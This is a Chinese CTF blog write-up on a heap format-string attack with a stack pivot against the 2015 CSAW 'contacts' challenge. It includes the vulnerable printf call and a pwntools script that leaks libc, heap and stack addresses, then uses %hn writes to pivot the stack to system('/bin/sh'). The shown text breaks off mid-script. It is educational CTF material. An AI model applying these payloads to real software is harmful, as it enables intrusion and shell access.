



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="" href="https://yhuanhuan01.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="" href="https://yhuanhuan01.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="" href="https://yhuanhuan01.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="堆——格式化字符串,栈迁移" />


<link rel="canonical" href="https://yhuanhuan01.github.io/2024/07/29/%E5%A0%86%E4%B8%8A%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E5%88%A9%E7%94%A8/">



  <title>
堆上格式化字符利用 - 堆攻击 |
yhuanhuan =  = 不在能知，乃在能行</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">堆上格式化字符利用
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2024-07-29 21:56:59">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2024-07-29T21:56:59+08:00">2024-07-29</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>3.7k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>3 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">yhuanhuan</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/3QaAkKnrb4hzo58.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/8XHxYgIEC6JWoSP.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/c8LzaYO7NRj2Gmi.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/oM5TSDBwfh1Oa9r.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/KwJG42PtjmEyikW.png"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/08/03/xABdev7CEF4h3sR.png"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/%E5%A0%86%E6%94%BB%E5%87%BB/" itemprop="item" rel="index" title="分类于 堆攻击"><span itemprop="name">堆攻击</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://yhuanhuan01.github.io/2024/07/29/%E5%A0%86%E4%B8%8A%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E5%88%A9%E7%94%A8/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/huanhuan.png">
    <meta itemprop="name" content="yhuanhuan">
    <meta itemprop="description" content="不在能知，乃在能行, 欢迎来到Huan的笔记空间~~~~~~🌸">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="堆上格式化字符利用"><a class="markdownIt-Anchor" href="#堆上格式化字符利用">#</a> 堆上格式化字符利用</h1>
<h3 id="利用思路"><a class="markdownIt-Anchor" href="#利用思路">#</a> 利用思路：</h3>
<p>在堆上利用格式化字符串，需要注意几个问题</p>
<p>其实和别的格式化字符串几乎一样，只不过可以多一个利用思路，可以解 system (’/bin/sh’) 写入 chunk 块，篡改 ebp 或 rbp，在有返回地址的情况下 leave ret 之后，进行栈迁移，迁到 system (’/bin/sh’) 那部分地址的 - 4 或 - 8 处</p>
<p>接下来由一道题目详细介绍这类打法：</p>
<p><span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2N0Zi13aWtpL2N0Zi1jaGFsbGVuZ2VzL3RyZWUvbWFzdGVyL3B3bi9mbXRzdHIvMjAxNS1DU0FXLWNvbnRhY3Rz">https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/fmtstr/2015-CSAW-contacts</span></p>
<p>关于程序，需要分析它的贯穿题目利用的结构体</p>
<pre><code>00000000 Struct_phone struc ; (sizeof=0x50, mappedto_7)
00000000                               ; XREF: fetsName+1A/r
00000000                               ; fetsName+34/r ...
00000000 description dd ?              ; XREF: fetsdescription+41/w
00000000                               ; fetsdescription+46/r ...
00000004 phone_number dd ?             ; XREF: fetsPhone+2F/w
00000004                               ; fetsPhone+35/r ...
00000008 name db 64 dup(?)             ; XREF: fetsName+1A/r
00000008                               ; fetsName+34/r ... ; string(C)
00000048 length dd ?                   ; XREF: fetsdescription+2B/w
00000048                               ; Display+53/r ...
0000004C inuse dd ?                    ; XREF: Create+20/r Create+5D/w ...
00000050 Struct_phone ends
</code></pre>
<p>分析过程就不分析了，大概是这样</p>
<p>整个题目利用处在这里</p>
<figure class="highlight c"><figcaption data-lang="c"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">int</span> __cdecl <span class="token function">sub_8048BD1</span><span class="token punctuation">(</span><span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span>a1<span class="token punctuation">,</span> <span class="token keyword">int</span> a2<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span>a3<span class="token punctuation">,</span> <span class="token keyword">char</span> <span class="token operator">*</span>format<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="3"></td><td><pre>  <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"\tName: %s\n"</span><span class="token punctuation">,</span> a1<span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="4"></td><td><pre>  <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"\tLength %u\n"</span><span class="token punctuation">,</span> a2<span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="5"></td><td><pre>  <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"\tPhone #: %s\n"</span><span class="token punctuation">,</span> a3<span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="6"></td><td><pre>  <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"\tDescription: "</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="7"></td><td><pre>  <span class="token keyword">return</span> <span class="token function">printf</span><span class="token punctuation">(</span>format<span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="8"></td><td><pre><span class="token punctuation">&#125;</span></pre></td></tr></table></figure><p>在这里他是用户打印的内容，其中会格式化解析用户在堆上写入的字符串信息，通过这些信息，我们就很容实现格式化的利用，接下来我们通过劫持 ebp，从而将栈迁移到我们实现布置好的堆块上。</p>
<p>还是比较简单的，泄露完成信息之后将栈劫持 chunk 即可完成本次攻击</p>
<figure class="highlight python"><figcaption data-lang="python"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token triple-quoted-string string">'''</pre></td></tr><tr><td data-num="2"></td><td><pre>huan_attack_pwn</pre></td></tr><tr><td data-num="3"></td><td><pre>'''</span></pre></td></tr><tr><td data-num="4"></td><td><pre></pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token keyword">import</span> sys</pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span></pre></td></tr><tr><td data-num="7"></td><td><pre><span class="token comment"># from LibcSearcher import *</span></pre></td></tr><tr><td data-num="8"></td><td><pre><span class="token comment"># from ctypes import *</span></pre></td></tr><tr><td data-num="9"></td><td><pre><span class="token comment"># context(arch='amd64', os='linux', log_level='debug')</span></pre></td></tr><tr><td data-num="10"></td><td><pre>context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">'i386'</span> <span class="token punctuation">,</span> os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span> log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="11"></td><td><pre>binary <span class="token operator">=</span> <span class="token string">'./contacts'</span></pre></td></tr><tr><td data-num="12"></td><td><pre>libc <span class="token operator">=</span> <span class="token string">'/home/yhuan/glibc-all-in-one/libs/2.23-0ubuntu3_i386/libc.so.6'</span></pre></td></tr><tr><td data-num="13"></td><td><pre><span class="token comment"># host, port = ":".split(":")</span></pre></td></tr><tr><td data-num="14"></td><td><pre></pre></td></tr><tr><td data-num="15"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token string">'\033[31;40mremote\033[0m: (y)\n'</span></pre></td></tr><tr><td data-num="16"></td><td><pre>    <span class="token string">'\033[32;40mprocess\033[0m: (n)'</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="17"></td><td><pre></pre></td></tr><tr><td data-num="18"></td><td><pre><span class="token keyword">if</span> sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span> <span class="token operator">==</span> <span class="token string">'y'</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="19"></td><td><pre>    r <span class="token operator">=</span> remote<span class="token punctuation">(</span>host<span class="token punctuation">,</span> <span class="token builtin">int</span><span class="token punctuation">(</span>port<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="20"></td><td><pre><span class="token keyword">else</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="21"></td><td><pre>    r <span class="token operator">=</span> process<span class="token punctuation">(</span>binary<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="22"></td><td><pre></pre></td></tr><tr><td data-num="23"></td><td><pre><span class="token comment"># r = gdb.debug(binary)</span></pre></td></tr><tr><td data-num="24"></td><td><pre><span class="token comment"># libc = cdll.LoadLibrary(libc)</span></pre></td></tr><tr><td data-num="25"></td><td><pre>libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span>libc<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="26"></td><td><pre>elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span>binary<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="27"></td><td><pre><span class="token comment"># srand = libc.srand (libc.time (0)) #设置种子</span></pre></td></tr><tr><td data-num="28"></td><td><pre></pre></td></tr><tr><td data-num="29"></td><td><pre>default <span class="token operator">=</span> <span class="token number">1</span></pre></td></tr><tr><td data-num="30"></td><td><pre>se      <span class="token operator">=</span> <span class="token keyword">lambda</span> data                     <span class="token punctuation">:</span> r<span class="token punctuation">.</span>send<span class="token punctuation">(</span>data<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="31"></td><td><pre>sa      <span class="token operator">=</span> <span class="token keyword">lambda</span> delim<span class="token punctuation">,</span> data              <span class="token punctuation">:</span> r<span class="token punctuation">.</span>sendafter<span class="token punctuation">(</span>delim<span class="token punctuation">,</span> data<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="32"></td><td><pre>sl      <span class="token operator">=</span> <span class="token keyword">lambda</span> data                     <span class="token punctuation">:</span> r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>data<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="33"></td><td><pre>sla     <span class="token operator">=</span> <span class="token keyword">lambda</span> delim<span class="token punctuation">,</span> data              <span class="token punctuation">:</span> r<span class="token punctuation">.</span>sendlineafter<span class="token punctuation">(</span>delim<span class="token punctuation">,</span> data<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="34"></td><td><pre>rc      <span class="token operator">=</span> <span class="token keyword">lambda</span> numb<span class="token operator">=</span><span class="token number">4096</span>                <span class="token punctuation">:</span> r<span class="token punctuation">.</span>recv<span class="token punctuation">(</span>numb<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="35"></td><td><pre>rl      <span class="token operator">=</span> <span class="token keyword">lambda</span> time<span class="token operator">=</span>default             <span class="token punctuation">:</span> r<span class="token punctuation">.</span>recvline<span class="token punctuation">(</span>timeout<span class="token operator">=</span>time<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="36"></td><td><pre>ru      <span class="token operator">=</span> <span class="token keyword">lambda</span> delims<span class="token punctuation">,</span> time<span class="token operator">=</span>default     <span class="token punctuation">:</span> r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span>delims<span class="token punctuation">,</span>timeout<span class="token operator">=</span>time<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="37"></td><td><pre>rpu     <span class="token operator">=</span> <span class="token keyword">lambda</span> delims<span class="token punctuation">,</span> time<span class="token operator">=</span>default     <span class="token punctuation">:</span> r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span>delims<span class="token punctuation">,</span>timeout<span class="token operator">=</span>time<span class="token punctuation">,</span>drop<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="38"></td><td><pre>uu32    <span class="token operator">=</span> <span class="token keyword">lambda</span> data                     <span class="token punctuation">:</span> u32<span class="token punctuation">(</span>data<span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">,</span> <span class="token string">b'\0'</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="39"></td><td><pre>uu64    <span class="token operator">=</span> <span class="token keyword">lambda</span> data                     <span class="token punctuation">:</span> u64<span class="token punctuation">(</span>data<span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">b'\0'</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="40"></td><td><pre>lic     <span class="token operator">=</span> <span class="token keyword">lambda</span> data                     <span class="token punctuation">:</span> uu64<span class="token punctuation">(</span>ru<span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="41"></td><td><pre>padding <span class="token operator">=</span> <span class="token keyword">lambda</span> length                   <span class="token punctuation">:</span> <span class="token string">b'Yhuan'</span> <span class="token operator">*</span> <span class="token punctuation">(</span>length <span class="token operator">//</span> <span class="token number">5</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">b'Y'</span> <span class="token operator">*</span> <span class="token punctuation">(</span>length <span class="token operator">%</span> <span class="token number">5</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="42"></td><td><pre>lg      <span class="token operator">=</span> <span class="token keyword">lambda</span> var_name                 <span class="token punctuation">:</span> log<span class="token punctuation">.</span>success<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"</span><span class="token interpolation"><span class="token punctuation">&#123;</span>var_name<span class="token punctuation">&#125;</span></span><span class="token string"> ：0x</span><span class="token interpolation"><span class="token punctuation">&#123;</span><span class="token builtin">globals</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span>var_name<span class="token punctuation">]</span><span class="token punctuation">:</span><span class="token format-spec">x</span><span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="43"></td><td><pre>prl     <span class="token operator">=</span> <span class="token keyword">lambda</span> var_name                 <span class="token punctuation">:</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">len</span><span class="token punctuation">(</span>var_name<span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="44"></td><td><pre>debug   <span class="token operator">=</span> <span class="token keyword">lambda</span> command<span class="token operator">=</span><span class="token string">''</span>               <span class="token punctuation">:</span> gdb<span class="token punctuation">.</span>attach<span class="token punctuation">(</span>r<span class="token punctuation">,</span>command<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="45"></td><td><pre>it      <span class="token operator">=</span> <span class="token keyword">lambda</span>                          <span class="token punctuation">:</span> r<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="46"></td><td><pre></pre></td></tr><tr><td data-num="47"></td><td><pre></pre></td></tr><tr><td data-num="48"></td><td><pre></pre></td></tr><tr><td data-num="49"></td><td><pre><span class="token keyword">def</span> <span class="token function">createcontact</span><span class="token punctuation">(</span>name<span class="token punctuation">,</span> phone<span class="token punctuation">,</span> descrip_len<span class="token punctuation">,</span> description<span class="token punctuation">)</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="50"></td><td><pre>    ru<span class="token punctuation">(</span><span class="token string">'>>> '</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="51"></td><td><pre>    sl<span class="token punctuation">(</span><span class="token string">'1'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="52"></td><td><pre>    ru<span class="token punctuation">(</span><span class="token string">'Contact info: \n'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="53"></td><td><pre>    ru<span class="token punctuation">(</span><span class="token string">'Name: '</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="54"></td><td><pre>    sl<span class="token punctuation">(</span>name<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="55"></td><td><pre>    ru<span class="token punctuation">(</span><span class="token string">'You have 10 numbers\n'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="56"></td><td><pre>    sl<span class="token punctuation">(</span>phone<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="57"></td><td><pre>    ru<span class="token punctuation">(</span><span class="token string">'Length of description: '</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="58"></td><td><pre>    sl<span class="token punctuation">(</span>descrip_len<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="59"></td><td><pre>    ru<span class="token punctuation">(</span><span class="token string">'description:\n\t\t'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="60"></td><td><pre>    sl<span class="token punctuation">(</span>description<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="61"></td><td><pre></pre></td></tr><tr><td data-num="62"></td><td><pre></pre></td></tr><tr><td data-num="63"></td><td><pre><span class="token keyword">def</span> <span class="token function">printcontact</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="64"></td><td><pre>    ru<span class="token punctuation">(</span><span class="token string">'>>> '</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="65"></td><td><pre>    sl<span class="token punctuation">(</span><span class="token string">'4'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="66"></td><td><pre>    ru<span class="token punctuation">(</span><span class="token string">'Contacts:'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="67"></td><td><pre>    ru<span class="token punctuation">(</span><span class="token string">'Description: '</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="68"></td><td><pre></pre></td></tr><tr><td data-num="69"></td><td><pre><span class="token comment"># debug()</span></pre></td></tr><tr><td data-num="70"></td><td><pre></pre></td></tr><tr><td data-num="71"></td><td><pre>pl <span class="token operator">=</span> <span class="token string">'%2$paaaa'</span></pre></td></tr><tr><td data-num="72"></td><td><pre>createcontact<span class="token punctuation">(</span><span class="token string">'%p'</span><span class="token punctuation">,</span><span class="token string">'1111'</span><span class="token punctuation">,</span><span class="token builtin">str</span><span class="token punctuation">(</span><span class="token number">0x32</span><span class="token punctuation">)</span><span class="token punctuation">,</span>pl<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="73"></td><td><pre>printcontact<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="74"></td><td><pre>pause<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="75"></td><td><pre>ru<span class="token punctuation">(</span><span class="token string">'Descriptio0x'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="76"></td><td><pre>libcbase <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>rc<span class="token punctuation">(</span><span class="token number">10</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">16</span><span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token number">11</span> <span class="token operator">-</span> libc<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span></pre></td></tr><tr><td data-num="77"></td><td><pre>lg<span class="token punctuation">(</span><span class="token string">'libcbase'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="78"></td><td><pre>system <span class="token operator">=</span> libc<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span> <span class="token operator">+</span> libcbase</pre></td></tr><tr><td data-num="79"></td><td><pre>binsh <span class="token operator">=</span> <span class="token builtin">next</span><span class="token punctuation">(</span>libc<span class="token punctuation">.</span>search<span class="token punctuation">(</span><span class="token string">b'/bin/sh'</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">+</span> libcbase</pre></td></tr><tr><td data-num="80"></td><td><pre></pre></td></tr><tr><td data-num="81"></td><td><pre></pre></td></tr><tr><td data-num="82"></td><td><pre>pl <span class="token operator">=</span> flat<span class="token punctuation">(</span><span class="token punctuation">[</span></pre></td></tr><tr><td data-num="83"></td><td><pre>    p32<span class="token punctuation">(</span>system<span class="token punctuation">)</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="84"></td><td><pre>    <span class="token string">b'aaaa'</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="85"></td><td><pre>    p32<span class="token punctuation">(</span>binsh<span class="token punctuation">)</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="86"></td><td><pre>    <span class="token string">b'&lt;>%10$p()%6$pcccc'</span><span class="token punctuation">]</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="87"></td><td><pre></pre></td></tr><tr><td data-num="88"></td><td><pre>createcontact<span class="token punctuation">(</span><span class="token string">'huan'</span><span class="token punctuation">,</span><span class="token string">'1111'</span><span class="token punctuation">,</span><span class="token builtin">str</span><span class="token punctuation">(</span><span class="token number">0x32</span><span class="token punctuation">)</span><span class="token punctuation">,</span>pl<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="89"></td><td><pre>printcontact<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="90"></td><td><pre>ru<span class="token punctuation">(</span><span class="token string">'&lt;>0x'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="91"></td><td><pre>heapaddr <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>rc<span class="token punctuation">(</span><span class="token number">7</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">16</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="92"></td><td><pre>ru<span class="token punctuation">(</span><span class="token string">'()0x'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="93"></td><td><pre>stack <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>rc<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">16</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="94"></td><td><pre></pre></td></tr><tr><td data-num="95"></td><td><pre>ret_sys <span class="token operator">=</span> heapaddr <span class="token operator">+</span> <span class="token number">12</span></pre></td></tr><tr><td data-num="96"></td><td><pre>lg<span class="token punctuation">(</span><span class="token string">'heapaddr'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="97"></td><td><pre>lg<span class="token punctuation">(</span><span class="token string">'stack'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="98"></td><td><pre>lg<span class="token punctuation">(</span><span class="token string">'ret_sys'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="99"></td><td><pre><span class="token comment"># debug('b *0x08048BD1')</span></pre></td></tr><tr><td data-num="100"></td><td><pre></pre></td></tr><tr><td data-num="101"></td><td><pre>pause<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="102"></td><td><pre><span class="token comment"># debug()</span></pre></td></tr><tr><td data-num="103"></td><td><pre><span class="token comment"># pl1 = ret_sys &amp; 0xff</span></pre></td></tr><tr><td data-num="104"></td><td><pre><span class="token comment"># lg('pl1')</span></pre></td></tr><tr><td data-num="105"></td><td><pre>pl1 <span class="token operator">=</span> ret_sys <span class="token operator">&amp;</span> <span class="token number">0xffff</span></pre></td></tr><tr><td data-num="106"></td><td><pre>lg<span class="token punctuation">(</span><span class="token string">'pl1'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="107"></td><td><pre>pl2 <span class="token operator">=</span> <span class="token punctuation">(</span>ret_sys <span class="token operator">>></span> <span class="token number">16</span><span class="token punctuation">)</span> <span class="token operator">&amp;</span> <span class="token number">0xffff</span></pre></td></tr><tr><td data-num="108"></td><td><pre>lg<span class="token punctuation">(</span><span class="token string">'pl2'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="109"></td><td><pre><span class="token comment"># pause()</span></pre></td></tr><tr><td data-num="110"></td><td><pre></pre></td></tr><tr><td data-num="111"></td><td><pre></pre></td></tr><tr><td data-num="112"></td><td><pre><span class="token comment"># pl = '%' + str(ret_sys &amp; 0xffff) + 'c%6$n'</span></pre></td></tr><tr><td data-num="113"></td><td><pre><span class="token comment"># createcontact('huan','1111',str(0x32),pl)</span></pre></td></tr><tr><td data-num="114"></td><td><pre><span class="token comment"># printcontact()</span></pre></td></tr><tr><td data-num="115"></td><td><pre></pre></td></tr><tr><td data-num="116"></td><td><pre>pl <span class="token operator">=</span> <span class="token string">'%'</span> <span class="token operator">+</span> <span class="token builtin">str</span><span class="token punctuation">(</span>pl1<span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'c%6$hn'</span></pre></td></tr><tr><td data-num="117"></td><td><pre>createcontact<span class="token punctuation">(</span><span class="token string">'huan'</span><span class="token punctuation">,</span><span class="token string">'1111'</span><span class="token punctuation">,</span><span class="token builtin">str</span><span class="token punctuation">(</span><span class="token number">0x32</span><span class="token punctuation">)</span><span class="token punctuation">,</span>pl<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="118"></td><td><pre>printcontact<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="119"></td><td><pre></pre></td></tr><tr><td data-num="120"></td><td><pre>pl <span class="token operator">=</span> <span class="token string">'%'</span> <span class="token operator">+</span> <span class="token builtin">str</span><span class="token punctuation">(</span><span class="token punctuation">(</span>stack<span class="token operator">+</span><span class="token number">2</span><span class="token punctuation">)</span> <span class="token operator">&amp;</span> <span class="token number">0xffff</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'c%34$hn'</span></pre></td></tr><tr><td data-num="121"></td><td><pre>createcontact<span class="token punctuation">(</span><span class="token string">'huan'</span><span class="token punctuation">,</span><span class="token string">'1111'</span><span class="token punctuation">,</span><span class="token builtin">str</span><span class="token punctuation">(</span><span class="token 